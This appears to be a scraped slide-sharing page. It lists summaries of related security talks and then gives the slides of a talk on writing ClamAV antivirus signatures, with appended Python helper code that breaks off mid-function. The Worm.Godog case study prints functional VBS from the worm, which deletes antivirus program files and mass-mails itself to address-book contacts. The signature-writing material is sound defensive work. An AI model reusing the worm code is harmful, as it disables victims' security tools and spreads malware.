Alain Zidouemba presented on writing signatures for ClamAV. He discussed the different signature formats including .hdb, .mdb, .ndb, and .ldb. He provided examples of generating signatures using hash databases and extended signatures. He also demonstrated how to write logical signatures in .ldb format through a case study of the Worm.Godog malware. Whitelisting techniques were also covered, including adding entries to ignore specific signatures.
This is part 1 of fuzzing, an introduction to the subject. This presentation covers some of the theory and thought process behind the subject, as well as an introduction to environment variable fuzzing and file format fuzzing.
"A rootkits writer’s guide to defense" - Michal Purzynski (PROIDEA)
Michal will take you on a journey all the way to the 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team member approach writing rootkits? What is better - a false negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
RootedCON 2020 talk. In this talk, we showed the research about software dependencies that led us to rule the world for a day. Surprisingly, we could take control of more than 800 developer machines in less than 24 hours with the collusion of the most famous software dependency repositories... And with the "collaboration" of the developers ;)
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ... (RootedCON)
The document discusses techniques for obfuscating malicious PDF files to avoid detection. It begins with an introduction to the PDF format and its object types. It then covers many obfuscation techniques like avoiding characteristic strings, splitting up JavaScript code, encoding strings and names, using uncommon filters, and introducing malformed formatting. The document also analyzes how these techniques can help files evade antivirus detection and complicate analysis by tools. It highlights the peepdf tool for its Python-based interactive PDF analysis capabilities. In its conclusions, it finds that nested PDFs, compressed objects, new filters, encryption, and avoiding characteristic strings are very effective at evading detection.
The document describes a proof-of-concept malware called "evil mass storage" that can infect systems without an internet connection. It uses a custom hardware device with a micro SD card and radio frequency module to exfiltrate information from infected targets. The malware has multiple stages and can hide in encrypted sectors on the SD card or transmit data via radio. Details are provided on the prototype hardware, firmware, and future improvements planned for the project.
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON... (RootedCON)
Radare was originally created as a forensics tool but now also supports bindiffing binaries. It can perform multiple search methods on files including regular expressions, strings, and hexpairs. Signatures and magic templates allow parsing unknown file formats. Scripting is supported through Vala bindings. Filesystems can be mounted and partitions analyzed. Bindiffing helps analyze differences between binaries through function and basic block matching and fingerprints. A work-in-progress graphical interface called ragui is also being built.
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011] (RootedCON)
This document discusses hardware security and side channel attacks. It introduces side channel analysis techniques like differential power analysis and fault injection attacks. It explains how an attacker can use power traces or faults to deduce secret keys by forming hypotheses about intermediate values. Countermeasures are discussed like random delays, double checking results, and protecting code flow integrity. Developers are advised to get their systems tested since side channel vulnerabilities can be subtle.
Sourcefire Vulnerability Research Team Labs (losalamos)
Today's client side attack threats represent a boon for the attacker in ways to obfuscate, evade, and hide their attack methods. Adobe PDF, Flash, Microsoft Office documents, and JavaScript require a very deep understanding of the file format, how it's interpreted in the browser, and an understanding of the byte code paths that some of these formats can generate. Effectively handling some of these types of attacks requires processing these files multiple times to deal with compression, obfuscation, program execution, etc. This requires a new type of system to handle this type of inspection. The NRT system allows for this deep file format understanding and inspection.
Laura Garcia - Shodan API and Coding Skills [rooted2019] (RootedCON)
Laura García presents shodan-seeker, a Python tool she created for interacting with the Shodan API. The tool allows users to scan IP addresses and networks, get information on IPs from Shodan's database, detect new services, create and manage alerts, and subscribe to the streaming API. Some key features highlighted are diffing to detect new open ports, generating reports without consuming API credits, and full customization of input data, outputs, and alerts. Technical issues that may occur and how to address them are also covered.
DARPA CGC and DEFCON CTF: Automatic Attack and Defense Technique (Chong-Kuan Chen)
The document discusses automatic attack and defense techniques explored through DARPA's Cyber Grand Challenge (CGC) and DEFCON CTF competitions. It introduces CGC and covers topics like vulnerability discovery, fuzzing, symbolic/concolic execution, and software hardening. It describes CGC's qualification round in 2015 and final event in 2016, which was won by ForAllSecure/Mayhem. Various techniques used by competing teams are discussed, including AFL fuzzing, symbolic execution tools like S2E and Angr, and approaches that combined fuzzing and symbolic execution like Driller.
The document discusses Volatility and memory forensics. It covers topics like how Volatility works on different operating systems like Linux and Windows, acquiring memory dumps, analyzing memory structures like page tables and processes, dealing with semantic gaps in raw memory, plugin development, and investigating various artifacts in memory related to authentication, passwords, encryption, and applications. The document provides information on memory forensics techniques and how Volatility is used as an open-source memory forensics framework.
Valgrind overview: runtime memory checker and a bit more aka using #v... (Minsk Linux User Group)
Sergei Trofimovich «Valgrind overview: runtime memory checker and a bit more aka using #valgrind out in the sticks»
Talk given at the May 2013 MLUG Linux meetup
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ... (PROIDEA)
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges: The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead, writes a Powershell script to the Windows registry and executes it using a special regex-based run-key. Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. In every system reboot, it decrypts the payload in-memory and runs it with a Visual Basic script that runs Powershell. This allows Ramnit to avoid running a detectable, executable file as it used to do in the past. BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server. Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
This document discusses control hijacking attacks that aim to take control of a victim's machine by exploiting vulnerabilities in programs. It covers different types of attacks like buffer overflow attacks, integer overflow attacks, and format string vulnerabilities. These attacks work by injecting attack code or parameters to abuse vulnerabilities and modify memory to redirect the control flow. The document also discusses defenses like choosing programming languages with strong typing and automatic checks, auditing software, and adding runtime checks using techniques like stack canaries to detect exploits and prevent code execution.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by... (CODE BLUE)
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with a 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker can only overwrite the freed object at a fixed offset with a pointer to the object itself. Achieving kernel code execution with this bug can be very challenging. To solve the problem, we propose a new method that uses iovec to re-fill the freed object and compromises the pipe subsystem in the kernel. In this way we can convert this unusual memory corruption into arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is a UAF caused by a race condition; it may corrupt a critical kernel structure and lead to a kernel crash when the scheduler switches context back to the attacker's process. So we'll introduce a way to freeze the attacker's process soon after the UAF happens, stop the kernel from crashing, and make the exploit reliable.
In summary, this presentation presents the new techniques for exploiting use-after-free bugs that we recently found in the Android kernel. The exploitation ideas are fresh, and the details of the bugs have never been discussed before.
Hacking Highly Secured Enterprise Environments by Zoltan Balazs (Shakacon)
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario where the hacker/penetration-tester has deployed malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them is endless, e.g., communicating with a bind-shell on a webserver behind a restricted DMZ. Beware, live demo and fun included!
The document discusses preparing for and participating in the Defcon CTF qualifiers. It provides details on:
- Defcon CTF being one of the most prestigious CTF competitions, with only 10 teams qualifying. Teams get a FreeBSD box and must reverse, protect, and attack services. Points are earned through availability, reading other teams' keys, and overwriting keys.
- The qualifiers run from June 3rd to 6th, consisting of 5 categories with 5 progressively unlocked challenges each, over 53 non-stop hours. The scoreboard is a slow Java applet that can be bypassed by reversing the client class.
- One challenge involves a Ruby-based HTTP service with a vulnerable We
This document summarizes a three-part challenge involving cracking a MIPS binary, exploiting a Python/XXE vulnerability in a web application, and decrypting messages from a SecureDrop-like system. The MIPS binary is cracked by inverting its password checking algorithm. The web app is exploited via XXE to retrieve files containing an admin URL and view state details. Python code is modified at runtime to decrypt an AES key and access a "secret.key" file. This key reveals a tarball containing a SecureDrop implementation. A buffer overflow in SecDrop's service is used to run shellcode. Timing attacks via the CPU cache are then used to retrieve the private RSA key and decrypt messages stored by the SecureDrop-
The document discusses several advanced persistent threats (APTs) that have targeted systems in Korea and other countries, including the LuckyCat, Heartbeat, and Flashback malware campaigns. It provides details on the attacks, malware components, command and control infrastructure, and technical analysis of the threats. The document aims to help the digital forensics community in Korea understand these sophisticated cyber espionage activities and improve defenses against similar attacks.
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen (PROIDEA)
Chi-en Shen (Ashley) is a security researcher at FireEye, where she focuses on threat intelligence research. She specializes in threat hunting, malware analysis, reverse engineering, and targeted attacks research. Prior to FireEye, Ashley helped found Team T5, a threat research security company where she also works as a threat analyst. For supporting women in InfoSec, Ashley co-founded “HITCON GIRLS” – the first security community for women in Taiwan. Ashley is also a regular speaker at global security conferences, including Black Hat Europe, Black Hat Asia, FIRST, HITB GSEC, CODE BLUE, Troopers, HITCON and VXCON. Ashley also serves as a member of the Black Hat Asia review board where she evaluates research for briefings and training.
Admins and programmers like PowerShell, and hackers like it most of all. Being the native shell of Windows systems, it does not draw attention, while at the same time offering enormous offensive capabilities. During the talk Paweł will present both effective one-liners and multi-line scripts that can wreak havoc in an unprepared organization. Expect interesting C2 channels, malware written entirely in PowerShell, finding and exploiting poorly configured MSSQL servers, etc. 100% meat.
If one bug was found, there are others. One way to detect "inherited" v... (Positive Hack Days)
Speaker: Asuka Nakajima
The practice of reusing source code reduces software development costs. However, if the original source code contains a vulnerability, it is carried over into the new application as well. The speaker will describe an unusual way to detect "inherited" vulnerabilities in binary files without needing access to the source code or symbol files.
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif... (Codemotion)
This document discusses extended differential fuzzing techniques. It begins with an overview of common fuzzing and differential fuzzing. Extended differential fuzzing aims to detect more vulnerability types by analyzing outputs across different implementations, inputs, versions, and operating systems. These include path disclosure, user disclosure, error disclosure, code evaluation, command execution, network connections, and file reads. The document demonstrates examples of detecting these behaviors in PHP, Perl, Python and other languages. It promotes an open source fuzzing framework called XDiFF that automates extended differential analysis.
Let's Talk Technical: Malware Evasion and Detection (James Haughom Jr)
This is from my talk at IR18 geared around evasion techniques employed by malware, and detection methods for incident responders. I touch on everything from ransomware to evasive fileless WMI malware. My goal for this talk was to teach defenders about the inner workings and capabilities of malware, as well as some detection methods they may not have considered.
The document describes experiments related to system security and digital forensics.
The first experiment involves using static code analysis tools like RATS and Flawfinder to analyze code samples for vulnerabilities. The second experiment describes installing and using the vulnerability scanner Nessus to scan systems for known vulnerabilities.
The third experiment explores using the website copier HTTrack to download a website from the internet to a local directory while preserving the directory structure and links. The fourth experiment demonstrates configuring router security using passwords and access lists on Cisco Packet Tracer to filter traffic between VLANs and networks.
This article demonstrates the capabilities of the static code analysis methodology. Readers are invited to study samples of one hundred errors found in open-source C/C++ projects. All the errors were found with the PVS-Studio static code analyzer.
The document describes experiments related to system security and digital forensics.
The first experiment involves using static code analysis tools like RATS and Flawfinder to analyze code samples for vulnerabilities. The second experiment describes installing and using the vulnerability scanner Nessus to scan systems for known vulnerabilities.
The third experiment explores using the website copier HTTrack to download a website from the internet to a local directory while preserving the directory structure and links. The fourth experiment demonstrates configuring router security using passwords and access lists on Cisco Packet Tracer to filter traffic between VLANs and networks.
This article demonstrates capabilities of the static code analysis methodology. The readers are offered to study the samples of one hundred errors found in open-source projects in C/C++. All the errors have been found with the PVS-Studio static code analyzer.
100 bugs in Open Source C/C++ projects Andrey Karpov
This article demonstrates capabilities of the static code analysis methodology. The readers are offered to study the samples of one hundred errors found in open-source projects in C/C++.
Formbook is a malware that steals passwords and harvests credentials by injecting code into targeted applications like web browsers, mail clients, and IM apps. It uses various anti-analysis techniques like manually mapping ntdll.dll and checking for debuggers. Formbook employs process hollowing to inject its code into explorer.exe and other processes, then sets up inline userland hooks to intercept function calls and harvest passwords.
The document discusses practical incident response in heterogeneous environments and overcoming limitations of traditional approaches. It proposes utilizing intelligence-driven investigation and actionable IOCs to more flexibly shape the triage process across different operating systems. Examples are provided of using software fingerprinting and debugging symbols to attribute malware and build structured knowledge bases of attackers.
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in IUT CTF G3t R00t
This document discusses tools for static analysis of files, including ClamAV and YARA. ClamAV is an open-source antivirus engine that uses signatures to detect malware. Signatures can include strings, hashes, and byte patterns. YARA allows for more flexible identification of malware through rules that can detect strings, regular expressions, and byte patterns. Examples of ClamAV and YARA signatures are provided.
The document discusses the analysis of an attack involving a compromised website containing a PHP webshell. Additional artifacts found included an initial SQL injection, a China Chopper webshell, and a Golang-coded ss.exe backdoor. The attacker used a vulnerability in Sandboxie to evade detection and execute a debugsrv.exe trojan. Yara rules were provided to detect related malware samples. The investigation mapped the attacker's lateral movement and a remediation plan was implemented over 35 days.
Media parsing is known as one of the weakest components of every consumer system. It often operates complex data structures in the most performant way possible, which is at odds with security requirements, such as attack surface minimization, compartmentalization, and privilege separation. Compared to other operating systems, video decoding on MacOS/iOS is an interesting case for two different reasons. First, instead of running in usermode, a considerable portion of format parsing is implemented in a kernel extension called AppleAVD, exposing the kernel to additional remote attack vectors. Second, recent anonymous reports suggest that AppleAVD may have been exploited in the wild. Our talk investigates AppleAVD kernel extension in-depth, covering video decoding subsystem internals, analysis of vulnerabilities, and ways to exploit them.
Forensics perspective ERFA-møde marts 2017J Hartig
This document provides an overview of analyzing banker trojans from a digital forensics perspective. It discusses identifying how banker trojans persist on systems, how they are initially installed, and techniques for determining the timeline of infection. Free tools are presented for collecting artifacts like files, registry entries, and events for analysis. A case study of the Carbanak and Dridex banker trojans is briefly described. Finally, commercial incident response tools are summarized, including automated collection and analysis capabilities as well as reporting and data sharing functions.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Rahul Sasi
In 2014 the actors behind global cyber espionage campaign “Operation NetTraveler” celebrate ten years of activity. NetTraveler has targeted more than 350 high-profile victims in 40 countries. So it is high time we make our research public .We were able to attribute Netravler to PLA[People liberation Army] military camp in Lanzhou. We provide our analysis in the form of a PPT slide.
Part of this presentation is based on research published in 2015, which was demonstrated the increasing spread of malware binaries mach-o and how to analyze the type of these binary. In this presentation, we will explain with more detail the structure of Binary using debuggers tools and reverse engineering techniques.The knowledge gained will be useful from analysis of malware as also for challenges type crackmes on CTFs.
Ricardo L0gan will be giving a presentation on reversing Mach-O files at the Hackers to Hackers Conference (H2HC). The presentation will include an overview of the Mach-O file format used in Mac OS X and iOS, demonstrations of reversing sample crackmes and malware, and techniques for tricking and bypassing reverse engineering defenses. It will cover topics such as disassembly, debugging, and static/dynamic analysis tools useful for Mach-O reversing.
Penetrating Windows 8 with syringe utilityIOSR Journals
This document discusses penetrating Windows 8 remotely using Metasploit framework and syringe utility. It begins with an introduction to penetration testing and Windows 8 security. It then describes using Metasploit to generate a payload, encoding it to evade detection, and injecting it into a Windows 8 system using syringe. This allows establishing a meterpreter session and compromising the system by migrating processes and accessing the C drive. It concludes that Windows 8 has strong security but syringe injections allow compromising it, and more exploits could be found to enhance efficacy.
The PVS-Studio developers' team has carried out comparison of the own static code analyzer PVS-Studio with the open-source Cppcheck static code analyzer. As a material for comparison, the source codes of the three open-source projects by id Software were chosen: Doom 3, Quake 3: Arena, Wolfenstein: Enemy Territory. The article describes the comparison methodology and lists of detected errors. The conclusions section at the end of the article contains "non-conclusions" actually, as we consciously avoid drawing any conclusions: you can reproduce our comparison and draw your own ones.
This document contains information about an industrial control systems (ICS) security group including their goals, objectives, and vulnerabilities they focus on. It lists the members of the group and provides information on typical ICS network configurations, protocols used including Modbus, Profinet, DNP3, and others. It also discusses tools and scripts for assessing these protocols and mentions past vulnerabilities the group has found.
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...CODE BLUE
Malware utilize many cryptographic algorithms.
To fight against malware, analysts have to reveal details on malware activities.
Accordingly, it is important to identify cryptographic algorithms used in malware.
In this track, I propose a faster and extensible method to automatically detect known cryptographic algorithms in malware using dynamic binary instrumentation and fuzzy hashing.
Search for Vulnerabilities Using Static Code AnalysisAndrey Karpov
Vulnerabilities are the same things as common errors. Why do we distinguish them? Do this, if you want to earn more money. CWE - Common Weakness Enumeration. CVE - Common Vulnerabilities and Exposures. Now using Valgrind you're searching not for a memory leak, but for a denial of service.
An Experiment with Checking the glibc LibraryAndrey Karpov
We have recently carried out an experiment with checking the glibc library by PVS-Studio. Its purpose was to study how good our analyzer is at checking Linux-projects. The basic conclusion is, not much good yet. Non-standard extensions used in such projects make the analyzer generate a huge pile of false positives. However, we have found some interesting bugs.
A school project. How well does Metasploit encode its executables? I'm putting it to the test against 10 different antivirus programs. This is just the proposal; the finished version should be done in a month or so.
2. About the presenter
Alain Zidouemba
• VRT Research Engineer for over a year
• Primary responsibilities:
• Malware research & signatures generation – ClamAV
• Vulnerability research & rules generation – Snort
• Before Sourcefire: Anti-Malware Research Engineer
3. Outline
What is ClamAV
Where to get ClamAV
Different ClamAV signature formats:
• .hdb
• .mdb
• .ndb
• .ldb
Whitelisting
Q&A
5. What is ClamAV?
Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways
Provides a number of utilities including:
• A flexible and scalable multi-threaded daemon (clamd)
• A command line scanner (clamscan)
• An advanced tool for automatic database updates (freshclam)
• Sigtool – more later
6. Where can I get ClamAV from?
Latest stable release: ClamAV 0.94.2
• http://www.clamav.net/download/sources
Most popular UNIX operating systems are supported:
• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X
An up-to-date list of binary packages is available at our website:
• http://clamav.net/download/packages
7. Why learn how to write sigs?
I thought Sourcefire released signature updates several times a day!
8. ClamAV malware detection
Goal: recognize and block malware
Detection is:
• File-centric
• Focus on recognizing malicious code in files
Not intended to replace desktop AV
First line of defense
9. ClamAV Virus Database (CVD)
The ClamAV project distributes two CVD files
• main.cvd
• daily.cvd
Sigtool (ships with ClamAV) can display detailed information on CVD files:
12. Hash database: *.hdb
The format for .hdb files is as follows:
• MD5:Size:MalwareName
To create a signature for test.exe use the --md5 option of sigtool:
13. Hash database: *.hdb (cont’d)
That’s it! The signature is ready to be used:
• The name for the detection can be changed:
14. MD5, PE-section based: *.mdb
The format for .mdb files is as follows:
• PESectionSize:MD5:MalwareName
The easiest way to generate MD5-based section signatures is to extract the target PE sections into separate files and then run sigtool with the --mdb option:
15. Case study: Trojan.Bagle-328
IDA Pro indicates that the sample is “packed”
Packed with Themida (as per PEiD)
16. Case study: Trojan.Bagle-328 (cont'd)
Themida is used by malware writers... but also by legitimate products – a false positive is likely
We can use pe-sig, a Ruby script that will create sigs for each section of a PE file:
Finally, the signature is:
• 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328
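The two hash-based formats above, generated in Python as an added example (not the talk's sigtool or pe-sig commands): a whole-file .hdb entry and pe-sig-style per-section .mdb entries, read from a constructed minimal PE layout rather than a real binary.

```python
import hashlib
import struct


def hdb_entry(data: bytes, name: str) -> str:
    """MD5:Size:MalwareName for a whole file, what `sigtool --md5` prints."""
    return f"{hashlib.md5(data).hexdigest()}:{len(data)}:{name}"


def pe_sections(data: bytes):
    """Yield (section_name, raw_bytes) for every entry in a PE section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    nsections, = struct.unpack_from("<H", data, coff + 2)
    opt_size, = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_size          # section headers follow the optional header
    for i in range(nsections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), data[raw_ptr:raw_ptr + raw_size]


def mdb_entries(data: bytes, name: str) -> list:
    """PESectionSize:MD5:MalwareName for each section with raw data (pe-sig style)."""
    return [f"{len(raw)}:{hashlib.md5(raw).hexdigest()}:{name}"
            for _sname, raw in pe_sections(data) if raw]


def build_sample_pe() -> bytes:
    """Constructed minimal PE layout (DOS stub, COFF header, two sections):
    enough for the section-table parser above, not a loadable executable."""
    text = b"\x55\x89\xe5\x31\xc0\x5d\xc3" + b"\x90" * 9      # 16 bytes of code
    rdata = b"hello\0\0\0"                                   # 8 bytes of data
    e_lfanew = 64
    table = e_lfanew + 4 + 20                                 # SizeOfOptionalHeader = 0
    text_off = table + 40 * 2
    data_off = text_off + len(text)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x102)

    def section(name: bytes, raw: bytes, off: int, flags: int) -> bytes:
        # IMAGE_SECTION_HEADER: name, VirtualSize, VirtualAddress, SizeOfRawData,
        # PointerToRawData, reloc/linenumber fields (unused), Characteristics
        return struct.pack("<8sIIIIIIHHI", name, len(raw), 0x1000, len(raw), off, 0, 0, 0, 0, flags)

    return (dos + coff + section(b".text", text, text_off, 0x60000020)
            + section(b".rdata", rdata, data_off, 0x40000040) + text + rdata)
```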
17. Extended sig. format: *.ndb
The format for .ndb files is as follows:
• MalwareName:TargetType:Offset:HexSignature
• TargetType is one of the following numbers specifying the type of the target file:
0: Any file
1: Portable Executable
2: OLE2 component (eg: VBA script)
3: HTML (normalized)
4: Mail file
5: Graphics
6: ELF
7: ASCII text file (normalized)
21. Case study: Trojan.Exchanger (cont’d)
Signature for 5.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4
Signature for 7.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4
Signature to detect both 5.exe and 7.exe:
• Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
22. Case study: Trojan.Exchanger (cont’d)
Moreover, for 5.exe:
• EP: 0x4094E0
• Binary string: 0x4095C5
For 7.exe:
• EP: 0x406D87
• Binary string: 0x406E6C
In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal)
23. Case study: Trojan.Exchanger (cont’d)
Finally we can rewrite the signature to be:
• Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4
This signature is more precise and even matches other samples:
24. Logical signatures: *.ldb
Logical signatures were introduced in ClamAV 0.94
The format for .ldb files is as follows:
• SignatureName;TargetDescriptionBlock;LogicalExpression;Subsig0;Subsig1;Subsig2;...
25. Case study: Worm.Godog
A mass-mailer worm written in VBS
Registro = legion.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If FileExists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal Pro\*.*")
If fileexists (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\Avp32.exe") then path = Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal"
legions.DeleteFile (Registro & "\Kaspersky Lab\Kaspersky Antivirus Personal\*.*")
if FileExists(Registro & "\Antiviral Toolkit Pro\avp32.exe") then path = Registros & "\Antiviral Toolkit Pro"
legions.DeleteFile (Registro & "\Antiviral Toolkit Pro\*.*")
if fileexists (Registro & "\AVPersonal\Avguard.exe") then path = Registro & "\AVPersonal"
legions.DeleteFile (Registro & "\AVPersonal\*.*")
if fileexists (Registro & "\Trend PC-cillin 98\IOMON98.EXE") then path = Registro & "\Trend PC-cillin 98"
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.*")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.EXE")
legions.DeleteFile (Registro & "\Trend PC-cillin 98\*.dll")
26. Case study: Worm.Godog (cont’d)
After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows:
(0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c
(1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f
(2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c
(3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e
27. Case study: Worm.Godog (cont’d)
The worm also sends itself to the first 8000 contacts found in the address book:
Set Create = CreateObject ("Scripting.FileSystemObject")
Set mail = Create.CreateTextFile("C:\mail.vbs")
mail.writeline "On Error Resume Next"
mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E"
mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")"
mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")"
mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")"
mail.writeline "For A = 1 To Mail.AddressLists.Count"
mail.writeline "Set B = Mail.AddressLists (A)"
mail.writeline "Counter = 1"
mail.writeline "Set C = leg.CreateItem (0)"
mail.writeline "For D = 1 To B.AddressEntries.Count"
mail.writeline "E = B.AddressEntries (Counter)"
mail.writeline "C.Recipients.Add E"
mail.writeline "Counter = Counter + 1"
mail.writeline "If Counter > 8000 Then Exit For"
mail.writeline "Next"
mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)
mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34)
mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:\Legion.vbs" & Chr(34)
mail.writeline "C.DeleteAfterSubmit = True"
mail.writeline "C.Send"
mail.writeline "Next"
mail.Close
legion.Run ("C:\mail.vbs")
28. Case study: Worm.Godog (cont’d)
A signature to detect this mass-mailing portion of the file could be:
(4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
Finally, we can write this highly flexible signature:
• Worm.Godog;Target:0;((0|1|2|3)&(4));(0);(1);(2);(3);(4)
in a .ldb file:
Worm.Godog;Target:0;((0|1|2|3)&(4));66696c656578697374732028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c;66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f;66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c;66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e;666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464{-150}2e73656e64
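An added example (not code from the talk or from ClamAV) that evaluates both the Trojan.Exchanger .ndb signature from the earlier case study and the Worm.Godog .ldb signature above in Python: the hex body is translated to a byte regex, the EP+229 offset is honoured, and the logical expression is applied to the per-subsignature results. Inputs are constructed buffers with a chosen EP position and a constructed, already-normalized VBS snippet; the Godog subsignatures are assembled from the plaintext their hex encodes.

```python
import re


def hex_sig_to_regex(body: str) -> re.Pattern:
    # ClamAV hex body -> bytes regex: literal bytes, * (any run), {n} (exactly n
    # bytes), {-n} (up to n), {n-} (at least n), {n-m}; the subset the slides use.
    out = []
    for tok in re.findall(r"\{[^}]*\}|\*|[0-9a-fA-F]{2}", body):
        if tok == "*":
            out.append(b".*")
        elif tok.startswith("{"):
            lo, sep, hi = tok[1:-1].partition("-")
            out.append(b".{%d,%s}" % (int(lo or 0), hi.encode()) if sep else b".{%d}" % int(lo))
        else:
            out.append(re.escape(bytes.fromhex(tok)))
    return re.compile(b"".join(out), re.DOTALL)


def ndb_matches(sig: str, data: bytes, ep: int = 0) -> bool:
    # One .ndb line, MalwareName:TargetType:Offset:HexSignature; Offset is '*'
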